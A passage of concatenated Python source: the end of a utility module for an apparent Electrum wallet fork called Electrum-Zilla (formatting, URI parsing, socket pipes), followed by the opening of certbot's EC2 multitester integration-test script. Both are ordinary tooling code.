    return wrapper
def android_ext_dir():
    """Path of the device's shared external storage (requires jnius)."""
    import jnius
    env = jnius.autoclass('android.os.Environment')
    return env.getExternalStorageDirectory().getPath()
def android_data_dir():
    """App-private data directory inside the Kivy/Android sandbox."""
    import jnius
    PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
    return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
    """External directory for blockchain headers; created on first use."""
    d = android_ext_dir() + '/org.electrum.electrum'
    if not os.path.exists(d):
        os.mkdir(d)
    return d
def android_check_data_dir():
    """ if needed, move old directory to sandbox """
    ext_dir = android_ext_dir()
    data_dir = android_data_dir()
    old_electrum_dir = ext_dir + '/electrum'
    # One-time migration from the legacy external 'electrum' directory.
    if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
        import shutil
        # Headers move to their own external dir; everything else to the sandbox.
        new_headers_path = android_headers_dir() + '/blockchain_headers'
        old_headers_path = old_electrum_dir + '/blockchain_headers'
        if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
            print_error("Moving headers file to", new_headers_path)
            shutil.move(old_headers_path, new_headers_path)
        print_error("Moving data to", data_dir)
        shutil.move(old_electrum_dir, data_dir)
    return data_dir
def get_headers_dir(config):
    """Headers live in external storage on Android, else in the config dir."""
    if 'ANDROID_DATA' in os.environ:
        return android_headers_dir()
    return config.path

def assert_datadir_available(config_path):
    """Raise FileNotFoundError unless the Electrum datadir still exists."""
    if os.path.exists(config_path):
        return
    raise FileNotFoundError(
        'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
        'Should be at {}'.format(config_path))

def assert_file_in_datadir_available(path, config_path):
    """Raise FileNotFoundError if *path* is missing, blaming the datadir when it is gone too."""
    if os.path.exists(path):
        return
    assert_datadir_available(config_path)
    raise FileNotFoundError(
        'Cannot find file but datadir is there.' + '\n' +
        'Should be at {}'.format(path))
def assert_bytes(*args):
    """
    porting helper, assert args type
    """
    try:
        for x in args:
            assert isinstance(x, (bytes, bytearray))
    except AssertionError:
        # Narrowed from a bare `except:`; log the offending types to aid
        # porting debugging before re-raising.
        print('assert bytes failed', list(map(type, args)))
        raise
def assert_str(*args):
    """
    porting helper, assert args type
    """
    assert all(isinstance(x, str) for x in args)
def to_string(x, enc):
    """Decode bytes/bytearray using *enc*; pass str through; reject anything else."""
    if isinstance(x, str):
        return x
    if isinstance(x, (bytes, bytearray)):
        return x.decode(enc)
    raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
    """
    cast string to bytes() like object, but for python2 support it's bytearray copy
    """
    if isinstance(something, str):
        return something.encode(encoding)
    if isinstance(something, bytes):
        return something
    if isinstance(something, bytearray):
        return bytes(something)
    raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex  # hex str -> bytes
hfu = binascii.hexlify  # bytes -> lowercase hex (as bytes)
def bh2u(x):
    """
    str with hex representation of a bytes-like object

    >>> x = bytes((1, 2, 10))
    >>> bh2u(x)
    '01020a'

    :param x: bytes
    :rtype: str
    """
    # Fixed doctest: binascii.hexlify emits lowercase, so the example
    # previously showing '01020A' could never pass.
    return hfu(x).decode('ascii')
def user_dir():
    """Return the per-user Electrum-Zilla data directory, or None if unknown."""
    if 'ANDROID_DATA' in os.environ:
        return android_check_data_dir()
    elif os.name == 'posix':
        return os.path.join(os.environ["HOME"], ".electrum-zilla")
    elif "APPDATA" in os.environ:
        # Windows: roaming profile first, then local.
        return os.path.join(os.environ["APPDATA"], "Electrum-Zilla")
    elif "LOCALAPPDATA" in os.environ:
        return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Zilla")
    else:
        #raise Exception("No home directory found in environment variables.")
        return
def is_valid_email(s):
    """True when *s* loosely looks like an email address (something@host.tld)."""
    return bool(re.match(r"[^@]+@[^@]+\.[^@]+", s))
def format_satoshis_plain(x, decimal_point = 8):
    """Display a satoshi amount scaled. Always uses a '.' as a decimal
    point and has no thousands separator"""
    scaled = Decimal(x) / pow(10, decimal_point)
    return "{:.8f}".format(scaled).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
    """Format an integer satoshi amount for display.

    x: amount in satoshis, or None -> 'unknown'.
    num_zeros: minimum number of fractional digits to keep after stripping.
    decimal_point: decimal places per whole unit (8 for ZILLA).
    precision: digits to format before stripping; defaults to decimal_point.
    is_diff: prefix positive amounts with '+'.
    whitespaces: pad to a fixed 15-character column for tabular display.
    """
    from locale import localeconv
    if x is None:
        return 'unknown'
    if precision is None:
        precision = decimal_point
    decimal_format = ".0" + str(precision) if precision > 0 else ""
    if is_diff:
        decimal_format = '+' + decimal_format
    result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
    integer_part, fract_part = result.split(".")
    # Use the locale's decimal separator in the displayed string.
    dp = localeconv()['decimal_point']
    if len(fract_part) < num_zeros:
        fract_part += "0" * (num_zeros - len(fract_part))
    result = integer_part + dp + fract_part
    if whitespaces:
        # Right-pad to a fixed fraction width, then left-pad to 15 chars.
        result += " " * (decimal_point - len(fract_part))
        result = " " * (15 - len(result)) + result
    return result
FEERATE_PRECISION = 1  # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)

def format_fee_satoshis(fee, num_zeros=0):
    """Format a fee rate with FEERATE_PRECISION fractional digits."""
    return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)

def quantize_feerate(fee):
    """Strip sat/byte fee rate of excess precision."""
    if fee is None:
        return None
    quantized = Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
    return quantized
def timestamp_to_datetime(timestamp):
    """Convert a POSIX timestamp to a local datetime, or None for None."""
    return None if timestamp is None else datetime.fromtimestamp(timestamp)

def format_time(timestamp):
    """Human-readable local time string (millisecond precision) or 'Unknown'."""
    date = timestamp_to_datetime(timestamp)
    if date is None:
        return _("Unknown")
    return date.isoformat(' ')[:-3]
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
    """Approximate English age of a POSIX timestamp, e.g. '3 days ago'."""
    if from_date is None:
        return "Unknown"
    from_date = datetime.fromtimestamp(from_date)
    if since_date is None:
        # NOTE(review): from_date is naive; a non-None target_tz makes
        # since_date timezone-aware, and comparing naive to aware datetimes
        # raises TypeError -- confirm callers never pass target_tz.
        since_date = datetime.now(target_tz)
    td = time_difference(from_date - since_date, include_seconds)
    return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
    """Render a timedelta as an approximate English age ('about 1 hour', '3 days', ...)."""
    total_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
    total_minutes = int(round(total_seconds/60))
    if total_minutes <= 1:
        if not include_seconds:
            return "less than a minute" if total_minutes == 0 else "1 minute"
        for remainder in [5, 10, 20]:
            if total_seconds < remainder:
                return "less than %s seconds" % remainder
        if total_seconds < 40:
            return "half a minute"
        if total_seconds < 60:
            return "less than a minute"
        return "1 minute"
    if total_minutes < 45:
        return "%s minutes" % total_minutes
    if total_minutes < 90:
        return "about 1 hour"
    if total_minutes < 1440:
        return "about %d hours" % (round(total_minutes / 60.0))
    if total_minutes < 2880:
        return "1 day"
    if total_minutes < 43220:
        # Thresholds kept exactly as in the original (43220, not 43200).
        return "%d days" % (round(total_minutes / 1440))
    if total_minutes < 86400:
        return "about 1 month"
    if total_minutes < 525600:
        return "%d months" % (round(total_minutes / 43200))
    if total_minutes < 1051200:
        return "about 1 year"
    return "over %d years" % (round(total_minutes / 525600))
# Known block explorers: display name -> (base URL, {kind: path prefix}).
# 'kind' is 'tx' or 'addr' as used by block_explorer_URL below.
mainnet_block_explorers = {
    'zillaexplorer' : ('https://zillaexplorer.io/',
                        {'tx': 'tx/', 'addr': 'address/'}),
    'system default': ('blockchain:/',
                        {'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
    'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
                       {'tx': 'tx/', 'addr': 'address/'}),
    'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
                       {'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
    """Return the explorer table matching the active network."""
    from . import constants
    if constants.net.TESTNET:
        return testnet_block_explorers
    return mainnet_block_explorers

def block_explorer(config):
    """The configured block explorer name, defaulting to 'Blocktrail.com'."""
    return config.get('block_explorer', 'Blocktrail.com')

def block_explorer_tuple(config):
    """(base_url, kind->path dict) for the configured explorer, or None."""
    return block_explorer_info().get(block_explorer(config))

def block_explorer_URL(config, kind, item):
    """Full explorer URL for a 'tx' or 'addr' item, or None when unsupported."""
    explorer = block_explorer_tuple(config)
    if not explorer:
        return None
    path_prefix = explorer[1].get(kind)
    if not path_prefix:
        return None
    return explorer[0] + path_prefix + item
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
    """Parse a 'bitcoin:' payment URI (or bare address) into a dict.

    Recognized keys: address, amount (converted to int satoshis),
    message/memo, time, exp, sig, r, name.  When on_pr is given and the
    URI references a payment request, the request is fetched/deserialized
    on a daemon thread and passed to on_pr.
    Raises Exception for malformed addresses/URIs or duplicate query keys.
    """
    from . import bitcoin
    from .bitcoin import COIN
    if ':' not in uri:
        # No scheme: treat the whole string as a bare address.
        if not bitcoin.is_address(uri):
            raise Exception("Not a bitcoin address")
        return {'address': uri}
    u = urllib.parse.urlparse(uri)
    if u.scheme != 'bitcoin':
        raise Exception("Not a bitcoin URI")
    address = u.path
    # python for android fails to parse query
    if address.find('?') > 0:
        address, query = u.path.split('?')
        pq = urllib.parse.parse_qs(query)
    else:
        pq = urllib.parse.parse_qs(u.query)
    for k, v in pq.items():
        if len(v)!=1:
            raise Exception('Duplicate Key', k)
    out = {k: v[0] for k, v in pq.items()}
    if address:
        if not bitcoin.is_address(address):
            raise Exception("Invalid bitcoin address:" + address)
        out['address'] = address
    if 'amount' in out:
        # Amount is either '<value>X<exponent>' or a plain decimal in coins.
        am = out['amount']
        m = re.match('([0-9\.]+)X([0-9])', am)
        if m:
            k = int(m.group(2)) - 8
            amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
        else:
            amount = Decimal(am) * COIN
        out['amount'] = int(amount)
    if 'message' in out:
        out['message'] = out['message']
        out['memo'] = out['message']
    if 'time' in out:
        out['time'] = int(out['time'])
    if 'exp' in out:
        out['exp'] = int(out['exp'])
    if 'sig' in out:
        out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    if on_pr and (r or (name and sig)):
        # Fetch/deserialize the payment request off the main thread.
        def get_payment_request_thread():
            from . import paymentrequest as pr
            if name and sig:
                s = pr.serialize_request(out).SerializeToString()
                request = pr.PaymentRequest(s)
            else:
                request = pr.get_payment_request(r)
            if on_pr:
                on_pr(request)
        t = threading.Thread(target=get_payment_request_thread)
        # NOTE(review): setDaemon() is a deprecated alias of `daemon = True`.
        t.setDaemon(True)
        t.start()
    return out
def create_URI(addr, amount, message):
    """Build a 'bitcoin:' payment URI; returns '' when *addr* is not valid."""
    from . import bitcoin
    if not bitcoin.is_address(addr):
        return ""
    params = []
    if amount:
        params.append('amount=%s'%format_satoshis_plain(amount))
    if message:
        params.append('message=%s'%urllib.parse.quote(message))
    result = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(params), fragment='')
    return urllib.parse.urlunparse(result)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
    # Write the prompt to stdout explicitly, then delegate to the original
    # builtin input() saved below.
    if prompt:
        sys.stdout.write(prompt)
    return builtin_raw_input()
import builtins
# Save the original builtin and monkeypatch input() module-wide.
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
    """Parse one newline-terminated JSON value off the front of *message* (bytes).

    Returns (obj_or_None, remaining_bytes); obj is None when no complete
    line is buffered yet or the line is not valid UTF-8 JSON.
    """
    # TODO: check \r\n pattern
    n = message.find(b'\n')
    if n==-1:
        return None, message
    try:
        j = json.loads(message[0:n].decode('utf8'))
    except (ValueError, UnicodeDecodeError):
        # Narrowed from a bare `except:`; ValueError covers JSONDecodeError.
        j = None
    return j, message[n+1:]
class timeout(Exception):
    """Raised by SocketPipe/QueuePipe get() when no message arrives in time."""
    pass
import socket
import json
import ssl
import time
class SocketPipe:
    """Newline-delimited JSON message framing over a (possibly SSL) socket."""
    def __init__(self, socket):
        self.socket = socket
        self.message = b''  # bytes received but not yet parsed into messages
        self.set_timeout(0.1)
        self.recv_time = time.time()  # timestamp of the last successful recv
    def set_timeout(self, t):
        self.socket.settimeout(t)
    def idle_time(self):
        """Seconds since data was last received."""
        return time.time() - self.recv_time
    def get(self):
        """Return the next decoded JSON message, or None when the peer closed.

        Raises `timeout` when no complete message arrives in time.
        """
        while True:
            response, self.message = parse_json(self.message)
            if response is not None:
                return response
            try:
                data = self.socket.recv(1024)
            except socket.timeout:
                raise timeout
            except ssl.SSLError:
                raise timeout
            except socket.error as err:
                # NOTE(review): errno 60 is ETIMEDOUT on macOS -- confirm the
                # platform-specific intent here.
                if err.errno == 60:
                    raise timeout
                elif err.errno in [11, 35, 10035]:
                    # EAGAIN (Linux) / EAGAIN (BSD) / WSAEWOULDBLOCK (Windows).
                    print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
                    time.sleep(0.2)
                    raise timeout
                else:
                    print_error("pipe: socket error", err)
                    data = b''
            except:
                traceback.print_exc(file=sys.stderr)
                data = b''
            if not data:  # Connection closed remotely
                return None
            self.message += data
            self.recv_time = time.time()
    def send(self, request):
        out = json.dumps(request) + '\n'
        out = out.encode('utf8')
        self._send(out)
    def send_all(self, requests):
        # Batch-encode all requests into one buffer before sending.
        out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
        self._send(out)
    def _send(self, out):
        # Keep sending until the whole buffer is flushed; transient SSL
        # errors are retried after a short pause.
        while out:
            try:
                sent = self.socket.send(out)
                out = out[sent:]
            except ssl.SSLError as e:
                print_error("SSLError:", e)
                time.sleep(0.1)
                continue
class QueuePipe:
    """A SocketPipe-like transport backed by a pair of in-process queues."""

    def __init__(self, send_queue=None, get_queue=None):
        self.send_queue = send_queue if send_queue else queue.Queue()
        self.get_queue = get_queue if get_queue else queue.Queue()
        self.set_timeout(0.1)

    def get(self):
        """Pop one response; raise `timeout` when none arrives in time."""
        try:
            return self.get_queue.get(timeout=self.timeout)
        except queue.Empty:
            raise timeout

    def get_all(self):
        """Drain and return every response currently queued (possibly none)."""
        drained = []
        try:
            while True:
                drained.append(self.get_queue.get_nowait())
        except queue.Empty:
            pass
        return drained

    def set_timeout(self, t):
        self.timeout = t

    def send(self, request):
        self.send_queue.put(request)

    def send_all(self, requests):
        for request in requests:
            self.send(request)
def setup_thread_excepthook():
    """
    Workaround for `sys.excepthook` thread bug from:
    http://bugs.python.org/issue1230540
    Call once from the main thread before creating any threads.
    """
    init_original = threading.Thread.__init__
    def init(self, *args, **kwargs):
        init_original(self, *args, **kwargs)
        run_original = self.run
        # Wrap each thread's run() so uncaught exceptions are routed
        # through sys.excepthook instead of the per-thread default.
        def run_with_except_hook(*args2, **kwargs2):
            try:
                run_original(*args2, **kwargs2)
            except Exception:
                sys.excepthook(*sys.exc_info())
        self.run = run_with_except_hook
    # Monkeypatch Thread.__init__ process-wide.
    threading.Thread.__init__ = init
def versiontuple(v):
    """'1.2.3' -> (1, 2, 3)."""
    return tuple(int(part) for part in v.split("."))
def import_meta(path, validater, load_meta):
    """Read JSON from *path*, validate it with *validater*, pass it to *load_meta*.

    Raises FileImportFailed on any read/parse/validation error.
    """
    try:
        with open(path, 'r', encoding='utf-8') as f:
            d = validater(json.loads(f.read()))
        load_meta(d)
    #backwards compatibility for JSONDecodeError
    except ValueError:
        traceback.print_exc(file=sys.stderr)
        raise FileImportFailed(_("Invalid JSON code."))
    except Exception as e:
        # Exception (not BaseException) so KeyboardInterrupt/SystemExit
        # still propagate; traceback now goes to stderr like the branch above.
        traceback.print_exc(file=sys.stderr)
        raise FileImportFailed(e)
def export_meta(meta, fileName):
    """Write *meta* as pretty-printed, key-sorted JSON to *fileName*.

    Raises FileExportFailed on any OS-level write error.
    """
    try:
        with open(fileName, 'w+', encoding='utf-8') as f:
            json.dump(meta, f, indent=4, sort_keys=True)
    except OSError as e:
        # IOError and os.error are both aliases of OSError in Python 3,
        # so a single OSError clause is equivalent and clearer.
        traceback.print_exc(file=sys.stderr)
        raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
    """Make directory if it does not yet exist (owner-only permissions)."""
    if os.path.exists(path):
        return
    if not allow_symlink and os.path.islink(path):
        raise Exception('Dangling link: ' + path)
    os.mkdir(path)
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
multitester.py | """
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_leauto_upgrades.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket, traceback
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
from botocore.exceptions import ClientError
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
                    help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
                    help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
                    help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
                    default='test_letsencrypt_auto_certonly_standalone.sh',
                    help='path of bash script in to deploy and run')
#parser.add_argument('--script_args',
#                    nargs='+',
#                    help='space-delimited list of arguments to pass to the bash test script',
#                    required=False)
parser.add_argument('--repo',
                    default='https://github.com/letsencrypt/letsencrypt.git',
                    help='certbot git repo to use')
parser.add_argument('--branch',
                    default='~',
                    help='certbot git branch to trial')
parser.add_argument('--pull_request',
                    default='~',
                    help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
                    action='store_true',
                    help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
                    action='store_true',
                    help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
                    default='',
                    help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
                    action='store_true',
                    help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
                    action='store_true',
                    help="only make a boulder server")
parser.add_argument('--fast',
                    action='store_true',
                    help="use larger instance types to run faster (saves about a minute, probably not worth it)")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
# A profile of 'SET_BY_ENV' yields PROFILE=None (credentials from environment).
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-072a9534772bec854' # premade shared boulder AMI 18.04LTS us-east-1
LOGDIR = "letest-%d"%int(time.time()) #points to logging / working directory
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status(object):
    """Possible statuses of client tests."""
    # Plain string constants used as test-result markers.
    PASS = 'pass'
    FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
    """Should we use the given subnet for these tests?

    We should if it is the default subnet for the availability zone or the
    subnet is named "certbot-subnet".
    """
    if not subnet.map_public_ip_on_launch:
        return False
    if subnet.default_for_az:
        return True
    return any(tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME
               for tag in subnet.tags)
def make_security_group(vpc):
    """Creates a security group in the given VPC."""
    # will fail if security group of GroupName already exists
    # cannot have duplicate SGs of the same name
    mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
                                     Description='security group for automated testing')
    # SSH, HTTP and HTTPS open to the world.
    mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
    mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
    mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
    # for boulder wfe (http) server
    mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
    # for mosh
    mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
    return mysg
def make_instance(ec2_client,
                  instance_name,
                  ami_id,
                  keyname,
                  security_group_id,
                  subnet_id,
                  machine_type='t2.micro',
                  userdata=""): #userdata contains bash or cloud-init script
    """Launch one tagged EC2 instance and return the created instance object."""
    block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
    # Name tag so instances are identifiable in the EC2 console.
    tags = [{'Key': 'Name', 'Value': instance_name}]
    tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
    return ec2_client.create_instances(
        BlockDeviceMappings=block_device_mappings,
        ImageId=ami_id,
        SecurityGroupIds=[security_group_id],
        SubnetId=subnet_id,
        KeyName=keyname,
        MinCount=1,
        MaxCount=1,
        UserData=userdata,
        InstanceType=machine_type,
        TagSpecifications=tag_spec)[0]
def _get_block_device_mappings(ec2_client, ami_id):
    """Returns the list of block device mappings to ensure cleanup.

    This list sets connected EBS volumes to be deleted when the EC2
    instance is terminated.
    """
    # Not all devices use EBS, but the default value for DeleteOnTermination
    # when the device does use EBS is true. See:
    # * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
    # * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
    # Only mappings whose AMI default is DeleteOnTermination=False need an
    # explicit override; the rest already clean up on termination.
    return [{'DeviceName': mapping['DeviceName'],
             'Ebs': {'DeleteOnTermination': True}}
            for mapping in ec2_client.Image(ami_id).block_device_mappings
            if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
    """Blocks until the server at *urlstring* responds to HTTP requests.

    Polls every *wait_time* seconds for up to *timeout* seconds, printing a
    '.' per attempt as a progress indicator.

    Returns True once the server answered, False on timeout. (The previous
    implementation returned None and also slept one extra *wait_time* after
    the server had already answered; both are fixed here.)
    """
    server_ready = False
    t_elapsed = 0
    while not server_ready and t_elapsed < timeout:
        sys.stdout.write('.')
        sys.stdout.flush()
        try:
            req = urllib2.Request(urlstring)
            urllib2.urlopen(req)
            # Any successful response (no URLError raised) counts as ready.
            server_ready = True
        except urllib2.URLError:
            # Server not up yet; wait before the next attempt.
            time.sleep(wait_time)
            t_elapsed += wait_time
    return server_ready
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
    """Blocks until the server at *ipstring* has an open port 22.

    Retries every *wait_time* seconds for up to *timeout* seconds.
    Returns True if the port opened, False on timeout.

    Bug fixed: the original closed only the final socket, leaking one file
    descriptor per failed connection attempt; each attempt's socket is now
    closed in a ``finally`` block.
    """
    reached = False
    t_elapsed = 0
    while not reached and t_elapsed < timeout:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((ipstring, 22))
            reached = True
        except socket.error:
            time.sleep(wait_time)
            t_elapsed += wait_time
        finally:
            # Close every attempt's socket (the caller only needs to know the
            # port is reachable, not keep the connection).
            sock.close()
    return reached
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
    "Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
    # Poll until the instance is in the 'running' state AND has been assigned
    # a public IP; both can lag behind instance creation.
    state = booting_instance.state['Name']
    ip = booting_instance.public_ip_address
    while state != 'running' or ip is None:
        time.sleep(wait_time)
        # The instance needs to be reloaded to update its local attributes. See
        # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
        booting_instance.reload()
        state = booting_instance.state['Name']
        ip = booting_instance.public_ip_address
    # Wait for sshd to actually answer on port 22, then pad with
    # extra_wait_time since slow instances may still be finishing boot.
    block_until_ssh_open(ip)
    time.sleep(extra_wait_time)
    return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
    "clones master of repo_url"
    # All work happens inside the per-run log directory; any previous checkout
    # is removed, and the fresh tree is packaged as le.tar.gz for upload to
    # the remote test instances (see local_repo_to_remote).
    with lcd(LOGDIR):
        local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
        local('git clone %s letsencrypt' % repo_url)
        local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
    "clones branch <branch_name> of repo_url"
    # Same flow as local_git_clone, but a single-branch clone of the
    # requested branch.
    with lcd(LOGDIR):
        local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
        local('git clone %s letsencrypt --branch %s --single-branch' % (repo_url, branch_name))
        local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
    "clones specified pull request from repo_url and optionally merges into master"
    with lcd(LOGDIR):
        local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
        local('git clone %s letsencrypt' % repo_url)
        # GitHub exposes PR heads under refs/pull/<N>/head; fetch into a
        # throwaway local branch and check it out.
        local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest' % PRnumstr)
        local('cd letsencrypt && git checkout lePRtest')
        if merge_master:
            # Test the PR as it would look after merging current master.
            local('cd letsencrypt && git remote update origin')
            local('cd letsencrypt && git merge origin/master -m "testmerge"')
        local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
    "copies local tarball of repo to remote"
    # put() uploads to the remote host configured in fabric's env.host_string;
    # the tarball is then unpacked in the remote home directory.
    with lcd(LOGDIR):
        put(local_path='le.tar.gz', remote_path='')
        run('tar xzf le.tar.gz')
def local_repo_clean():
    "delete tarball"
    # Removes only the packaged tarball; the letsencrypt checkout in LOGDIR
    # is left in place.
    with lcd(LOGDIR):
        local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
    """Upload the local script at *scriptpath* to the remote host and run it
    there with *args* as its command-line arguments."""
    put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
    script_name = os.path.basename(scriptpath)
    arg_string = ' '.join(args)
    run('./' + script_name + ' ' + arg_string)
def run_boulder():
    # Starts the boulder ACME server (detached) from its checkout on the
    # remote host; assumes scripts/boulder_config.sh has already been run.
    with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
        run('sudo docker-compose up -d')
def config_and_launch_boulder(instance):
    # Configure then start boulder on the remote host. The `instance`
    # argument is currently unused; the target host comes from fabric's
    # global env.host_string.
    execute(deploy_script, 'scripts/boulder_config.sh')
    execute(run_boulder)
def install_and_launch_certbot(instance, boulder_url, target):
    # Upload the packaged repo to the client instance, then run the test
    # script with the environment variables the test scripts expect
    # (boulder location, this instance's addresses, target OS type).
    execute(local_repo_to_remote)
    with shell_env(BOULDER_URL=boulder_url,
                   PUBLIC_IP=instance.public_ip_address,
                   PRIVATE_IP=instance.private_ip_address,
                   PUBLIC_HOSTNAME=instance.public_dns_name,
                   PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
                   OS_TYPE=target['type']):
        execute(deploy_script, cl_args.test_script)
def grab_certbot_log():
    "grabs letsencrypt.log via cat into logged stdout"
    # The marker strings "[novarlog]"/"[nolocallog]" make a missing log
    # distinguishable from an empty one in the captured output.
    sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
        cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
    # fallback file if /var/log is unwriteable...? correct?
    sudo('if [ -f ./certbot.log ]; then \
        cat ./certbot.log; else echo "[nolocallog]"; fi')
def create_client_instance(ec2_client, target, security_group_id, subnet_id):
    """Create a single client instance for running tests."""
    # Machine type: explicit per-target override wins; otherwise pick by
    # virtualization type, upgrading when --fast was requested.
    if 'machine_type' in target:
        machine_type = target['machine_type']
    elif target['virt'] == 'hvm':
        machine_type = 't2.medium' if cl_args.fast else 't2.micro'
    else:
        # 32 bit systems
        machine_type = 'c1.medium' if cl_args.fast else 't1.micro'

    userdata = target.get('userdata', '')

    name = 'le-%s' % target['name']
    print(name, end=" ")
    return make_instance(ec2_client,
                         name,
                         target['ami'],
